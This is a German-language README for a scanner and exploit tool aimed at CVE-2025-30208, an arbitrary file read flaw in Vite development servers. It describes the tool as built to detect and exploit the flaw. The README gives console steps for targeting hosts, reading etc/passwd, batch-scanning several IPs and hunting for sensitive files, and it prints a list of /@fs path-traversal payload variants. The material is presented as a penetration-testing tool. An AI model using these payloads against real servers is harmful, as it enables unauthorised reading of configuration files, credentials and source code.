
CVE‑2025‑30208 ist eine Sicherheitslücke mittlerer Schwere, die beliebiges Lesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool) ermöglicht.
Fortschrittlicher Schwachstellenscanner für CVE-2025-30208 mit Enterprise-Funktionen
Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle „Arbitrary File Read“
🚀 Schnellstart • 📋 Funktionen • 🔧 Verwendung • 📊 Beispiele • 🛡️ Sicherheit
Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die Schwachstelle CVE-2025-30208 in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht den beliebigen Lesezugriff auf Dateien (Arbitrary File Read) über die Dateisystem-Endpunkte von Vite und kann potenziell sensible Konfigurationsdateien, Quellcode und Systeminformationen offenlegen.
Das Tool verfügt nun über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:
CVE-2025-30208.py - Haupt-Scanner-Anwendungpayloads.py - Fortschrittliche Exploit-Payloads (60+ Variationen)sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+ Dateien)html_template.py - Erweitertes HTML-Reporting-Template im Hacker-Stilpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Befehl | Beschreibung | Beispiel |
|---|---|---|
set <option> <value> | Konfigurationsoptionen festlegen | set RHOST 192.168.1.100 |
show options | Aktuelle Einstellungen anzeigen | show options |
edit | Interaktiver Optionseditor | edit |
run / exploit | Schwachstellentest ausführen | run |
batch | Mehrere Ziele im Stapel scannen | batch |
scan | Sensible Dateien finden | scan |
pull | Ergebnisse nach HTML/JSON exportieren | pull |
web [on|off|port] | Webserver für HTML-Berichte | web 8080 |
save | Sitzungskonfiguration speichern | save |
load | Sitzungskonfiguration laden | load |
test | Konnektivität zum Ziel testen | test |
validate | Aktuelle Konfiguration validieren | validate |
verbose | Ausführlichen Modus umschalten | verbose |
proxy | Proxy-Einstellungen konfigurieren | proxy |
headers | Benutzerdefinierte HTTP-Header festlegen | headers |
rate | Ratenbegrenzung konfigurieren | rate |
log | Protokollinformationen anzeigen | log |
help / ? | Hilfe anzeigen | help |
exit / quit | Tool beenden | exit |
| Option | Beschreibung | Standard | Validierung |
|---|---|---|---|
RHOST | Ziel-Host/IP-Adresse | - | Hostname/IP-Validierung |
RPORT | Ziel-Portnummer | - | Portbereich (1-65535) |
FILEPATH | Zu testender Dateipfad | etc/passwd | Pfadvalidierung |
PROXY | HTTP/HTTPS-Proxy-URL | - | URL-Formatvalidierung |
VERBOSE | Ausführliche Ausgabe aktivieren | false | Boolesche Validierung |
RATE_LIMIT | Verzögerung zwischen Anfragen (Sekunden) | 0.3 | Numerische Validierung |
THREADS | Anzahl der Threads für Stapel-Scanning | 5 | Ganzzahl-Validierung |
TIMEOUT | Anfrage-Timeout (Sekunden) | 5 | Ganzzahl-Validierung |
CUSTOM_HEADERS | Benutzerdefinierte HTTP-Header (JSON) | {} | JSON-Formatvalidierung |
Der Scanner verwendet nun 60+ verschiedene Payload-Varianten, die in payloads.py organisiert sind:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug